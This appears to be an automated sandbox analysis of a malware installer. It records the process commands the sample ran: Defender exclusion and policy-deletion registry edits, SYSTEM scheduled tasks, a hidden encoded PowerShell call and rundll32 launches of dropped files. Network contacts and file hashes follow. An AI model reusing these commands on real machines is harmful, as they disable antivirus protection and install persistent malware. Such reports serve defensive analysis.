powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SvbbHukzU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SvbbHukzU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYDCXZXPsTrrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYDCXZXPsTrrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nolBHjueEzUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nolBHjueEzUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yOvDRBMJNKKU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yOvDRBMJNKKU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YVKeAuHUOaLCRzVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YVKeAuHUOaLCRzVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\grMXAHIUMHIHAuvw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\grMXAHIUMHIHAuvw\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YVKeAuHUOaLCRzVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YVKeAuHUOaLCRzVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\grMXAHIUMHIHAuvw /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\grMXAHIUMHIHAuvw /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gkftsVzJZ" /SC once /ST 07:07:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gkftsVzJZ"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gkftsVzJZ"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "biFxKMwOTZzXEKwTU" /SC once /ST 12:59:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe\" NQ /site_id 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "biFxKMwOTZzXEKwTU"

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe NQ /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bWLKrWFeqGsUKIPSIT"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\SvbbHukzU\hIJhvE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HvGgydgoxkjNzSQ" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "HvGgydgoxkjNzSQ2" /F /xml "C:\Program Files (x86)\SvbbHukzU\FSnEmZP.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "HvGgydgoxkjNzSQ"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "HvGgydgoxkjNzSQ"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "SuOhdtQTTGzWOe" /F /xml "C:\Program Files (x86)\yOvDRBMJNKKU2\HtGLGFQ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "wXhUETfkEDyNN2" /F /xml "C:\ProgramData\YVKeAuHUOaLCRzVB\MntzzYJ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gmBhVUxyoAiYAznxf2" /F /xml "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\afuTILY.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ESjeOYxIKdVsIzcFOuL2" /F /xml "C:\Program Files (x86)\XYDCXZXPsTrrC\EmzDSqI.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bLgAHCKDimrPMlxXg" /SC once /ST 01:28:38 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\grMXAHIUMHIHAuvw\qGnJVfqS\GRGAgDv.dll\",#1 /site_id 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "bLgAHCKDimrPMlxXg"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\grMXAHIUMHIHAuvw\qGnJVfqS\GRGAgDv.dll",#1 /site_id 525403

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\grMXAHIUMHIHAuvw\qGnJVfqS\GRGAgDv.dll",#1 /site_id 525403

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "biFxKMwOTZzXEKwTU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bLgAHCKDimrPMlxXg"

Network

Country Destination Domain Proto
US 93.184.220.29:80 tcp
US 52.168.117.170:443 tcp
N/A 224.0.0.251:5353 udp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 addons.mozilla.org udp
NL 108.156.60.59:80 addons.mozilla.org tcp
NL 108.156.60.59:443 addons.mozilla.org tcp
US 8.8.8.8:53 clients2.google.com udp
NL 142.250.179.174:443 clients2.google.com tcp
US 8.8.8.8:53 api4.check-data.xyz udp
US 52.41.252.216:80 api4.check-data.xyz tcp

Files

memory/4048-132-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSFDFC.tmp\Install.exe

MD5 4bfffa8735d78ed8bda1fb092371dbe0
SHA1 9228519957b30b93327f023766e013dc64ca23a6
SHA256 1d8cb560979c79c00979be625b799a75cc3584f553c2f02e4bb0730fef445b6a
SHA512 5e1d98fd2447224da097191bf7be536db3d0ea62e99d91f266a5357420525e72ffd99dd7ea3621fce54a9d3ad26d02cfe0f1643ccde4a8c08478af5fd9f3a4aa

C:\Users\Admin\AppData\Local\Temp\7zSFDFC.tmp\Install.exe

MD5 4bfffa8735d78ed8bda1fb092371dbe0
SHA1 9228519957b30b93327f023766e013dc64ca23a6
SHA256 1d8cb560979c79c00979be625b799a75cc3584f553c2f02e4bb0730fef445b6a
SHA512 5e1d98fd2447224da097191bf7be536db3d0ea62e99d91f266a5357420525e72ffd99dd7ea3621fce54a9d3ad26d02cfe0f1643ccde4a8c08478af5fd9f3a4aa

memory/2820-135-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

memory/2820-138-0x0000000010000000-0x0000000011000000-memory.dmp

memory/1652-141-0x0000000000000000-mapping.dmp

memory/3516-142-0x0000000000000000-mapping.dmp

memory/4368-144-0x0000000000000000-mapping.dmp

memory/1780-143-0x0000000000000000-mapping.dmp

memory/2248-146-0x0000000000000000-mapping.dmp

memory/2896-145-0x0000000000000000-mapping.dmp

memory/4520-147-0x0000000000000000-mapping.dmp

memory/2128-148-0x0000000000000000-mapping.dmp

memory/1928-149-0x0000000000000000-mapping.dmp

memory/204-150-0x0000000000000000-mapping.dmp

memory/404-151-0x000001EA45C10000-0x000001EA45C32000-memory.dmp

memory/404-152-0x00007FF9F3A50000-0x00007FF9F4511000-memory.dmp

memory/3500-153-0x0000000000000000-mapping.dmp

memory/404-154-0x00007FF9F3A50000-0x00007FF9F4511000-memory.dmp

memory/2356-155-0x0000000000000000-mapping.dmp

memory/4452-156-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

memory/3152-162-0x0000000000000000-mapping.dmp

memory/3152-163-0x0000000003520000-0x0000000003556000-memory.dmp

memory/3152-164-0x0000000003C90000-0x00000000042B8000-memory.dmp

memory/3152-165-0x0000000003B40000-0x0000000003B62000-memory.dmp

memory/3152-166-0x0000000004330000-0x0000000004396000-memory.dmp

memory/3152-167-0x00000000043A0000-0x0000000004406000-memory.dmp

memory/3152-168-0x0000000004AE0000-0x0000000004AFE000-memory.dmp

memory/5060-169-0x0000000000000000-mapping.dmp

memory/4320-170-0x0000000000000000-mapping.dmp

memory/2700-171-0x0000000000000000-mapping.dmp

memory/4976-172-0x0000000000000000-mapping.dmp

memory/4688-173-0x0000000000000000-mapping.dmp

memory/4692-174-0x0000000000000000-mapping.dmp

memory/3168-175-0x0000000000000000-mapping.dmp

memory/800-176-0x0000000000000000-mapping.dmp

memory/1808-177-0x0000000000000000-mapping.dmp

memory/4724-178-0x0000000000000000-mapping.dmp

memory/2628-179-0x0000000000000000-mapping.dmp

memory/5016-180-0x0000000000000000-mapping.dmp

memory/4372-181-0x0000000000000000-mapping.dmp

memory/2932-182-0x0000000000000000-mapping.dmp

memory/1980-183-0x0000000000000000-mapping.dmp

memory/4196-184-0x0000000000000000-mapping.dmp

memory/3344-185-0x0000000000000000-mapping.dmp

memory/2352-186-0x0000000000000000-mapping.dmp

memory/1800-187-0x0000000000000000-mapping.dmp

memory/2304-188-0x0000000000000000-mapping.dmp

memory/1764-189-0x0000000000000000-mapping.dmp

memory/5020-190-0x0000000000000000-mapping.dmp

memory/5024-191-0x0000000000000000-mapping.dmp

memory/1748-192-0x0000000000000000-mapping.dmp

memory/316-193-0x0000000000000000-mapping.dmp

memory/1996-194-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b71d4c4e1b2d7eb58d8f15dbe2353afa
SHA1 cc10b9b89754e901a223bd962c7ffd507ef9c92b
SHA256 d87262f6bc8d9b814c2a1c2313f0da7a38a9cbe5e8813e02f83af2f05641e9ab
SHA512 bc000b49c1d0bc77eaa5aa68243beeb96b6b56b3982391053bf8fc82db738273cfea3c62c4772c1e37af08959cd56a4145930e093729cd7a4174f7001cfdd7f0

memory/3648-197-0x0000000000000000-mapping.dmp

memory/4280-198-0x0000000000000000-mapping.dmp

memory/4168-199-0x0000000000000000-mapping.dmp

memory/4156-200-0x0000000000000000-mapping.dmp

memory/684-201-0x0000000000000000-mapping.dmp

memory/1812-202-0x0000000000000000-mapping.dmp

memory/1816-203-0x0000000000000000-mapping.dmp

memory/1976-204-0x0000000000000000-mapping.dmp

memory/3308-205-0x0000000000000000-mapping.dmp

memory/4348-206-0x0000000000000000-mapping.dmp

memory/4832-207-0x0000000000000000-mapping.dmp

memory/4572-208-0x0000000000000000-mapping.dmp

memory/1752-209-0x0000000000000000-mapping.dmp

memory/1196-210-0x0000000000000000-mapping.dmp

memory/4472-211-0x0000000000000000-mapping.dmp

memory/4736-212-0x0000000000000000-mapping.dmp

memory/2552-213-0x0000000000000000-mapping.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

memory/2556-215-0x0000000000000000-mapping.dmp

memory/4452-216-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dbf9fec0284459c885c695c96fdd4e67
SHA1 f3530eb549137596bb53cde08a3e3cc1ea237faf
SHA256 3cc2ef28f616ca2a6e5fb06da63d6bdb53b63e92701ecee38e84f98b7f56b38a
SHA512 95a7858d009940a1c29f9c05c2bd2a6a03a3122fe749546d87e435b5d3172fd0d22dec099b450be3ea99c58b8681484eafd8ad00be1364d9085fc4a9f249f452

memory/4284-219-0x00007FF9F2790000-0x00007FF9F3251000-memory.dmp

memory/1428-220-0x0000000000000000-mapping.dmp

memory/4284-221-0x00007FF9F2790000-0x00007FF9F3251000-memory.dmp

memory/1420-222-0x0000000000000000-mapping.dmp

memory/2292-223-0x0000000000000000-mapping.dmp

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

memory/4388-229-0x00000000043F0000-0x0000000004475000-memory.dmp

memory/4388-233-0x0000000004A40000-0x0000000004AA5000-memory.dmp

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 279c01cba658fc0ad82f3c201619656c
SHA1 d73ebfda7c8708716b10de2819a7fed64a295e60
SHA256 ac063b67eaa6a6476ab856e4bd9ff4cf79bbe831880b18eb1cbb34948c7c6cab
SHA512 cf385228df756d6fc05a52e8883e89df71dc91434255143a200d9ed5eba13ce8a3635bc82991ea38bd35531056b3d286be785b451dab638b18293477f7542a55

C:\Program Files (x86)\SvbbHukzU\FSnEmZP.xml

MD5 cff7e99fdb298b59c84ab72b4f59acab
SHA1 359211c6bdb2b23c8aee1077b4dfca6ee1284aa0
SHA256 ab6b789943fbf121ea5b80f159304198953f56bd870ebc46c9f15f654d1765bb
SHA512 5d41a1ce7e8fd42e3c024bb3cc9b2441379c41568a6244b08ccbbbc8f5f12267e2470447dab295bab91318e2db96e8212229fe772b5292b4b7be56195e186951

C:\Program Files (x86)\yOvDRBMJNKKU2\HtGLGFQ.xml

MD5 d72db60b466651d1b4bc37acd91799fc
SHA1 bcbb91196a5fd5146ab2ad51298f9d3c0dfa6dc4
SHA256 4a9c3d57d8e2eb9ac6ed6d1356d869fc25b26b0b812c2f77c2dd4dc00c0311a3
SHA512 fb5b0019c417625ae4a316b36e42cb34f051afd9bd6fe72097f448da953fbeeed10836ee414d2f93a7b53c65bf590515f37f4b50a1e779b2d7e99bcc9db307a9

C:\ProgramData\YVKeAuHUOaLCRzVB\MntzzYJ.xml

MD5 b2b03d537ee0b4e3751543480baa29d1
SHA1 265be2adae465f91009a20a3a82226ae26315f9b
SHA256 13eb3ff51647766a3a411a48cdd1f28c3534892f2d1c6ac8d76bedfc3e14822d
SHA512 e7b873c3f600b4d01fcb3602ea863369a818f55088c2848870dbb1860dc4878e1d15da06f02a9694fcdc80d547f7ae6b5fa3d8610c883097a0cd5994deb8394e

C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\afuTILY.xml

MD5 ba33450f293914291cac22854c87db1b
SHA1 3dcaf6dc9240559b285720e6e435022a4b3b5349
SHA256 6d2bb7b182841338a7c2eda090b78e5854b5666bc5e94e2645388298b7314c92
SHA512 bafbd41139845d6b2a4e3c5aacd425d9de59ca6ab39e37bd76c541fd78c5219179d9a385f7cef144d5db61539de5c05282b7e4e102ef5c442ffbe58d188fc88d

C:\Program Files (x86)\XYDCXZXPsTrrC\EmzDSqI.xml

MD5 536e02e2d218629a626bc4e3315ba70a
SHA1 ff747ff227ad375ece23ee521eb2ec6a7360e217
SHA256 29f4f43f36de038b6d4903f7ebd13116a380c13de7215bebd391a98c59349a61
SHA512 e2ae8829de4b436f8e14921964b4f9d7915c9a12ff04951e9f887637535ef103ae3a7df7e99238ede89751b06d5aa4522ca00e4e771e7b78f3417f80f13e24b1

C:\Windows\Temp\grMXAHIUMHIHAuvw\qGnJVfqS\GRGAgDv.dll

MD5 b741306fbb35688df1c40ec6572783b7
SHA1 4d8f5b3698a82cbb3007ee6a21f3df1de5a24fa7
SHA256 fe578f2302cb40e6ba3044239dd2a0c1c722f0a32b68877191dbbb10b798ee41
SHA512 6017a55935f1ac4286656a47e55adfd2896a799a436d166e6478921ed0c104caa9edc0e050f313aba544989356a3a91cc08998fc5e91dfd634a0ed419bbab927

memory/4388-243-0x00000000053B0000-0x0000000005423000-memory.dmp

memory/4388-246-0x00000000055F0000-0x00000000056AF000-memory.dmp

C:\Windows\Temp\grMXAHIUMHIHAuvw\qGnJVfqS\GRGAgDv.dll

MD5 b741306fbb35688df1c40ec6572783b7
SHA1 4d8f5b3698a82cbb3007ee6a21f3df1de5a24fa7
SHA256 fe578f2302cb40e6ba3044239dd2a0c1c722f0a32b68877191dbbb10b798ee41
SHA512 6017a55935f1ac4286656a47e55adfd2896a799a436d166e6478921ed0c104caa9edc0e050f313aba544989356a3a91cc08998fc5e91dfd634a0ed419bbab927

memory/2212-252-0x0000000010640000-0x0000000011640000-memory.dmp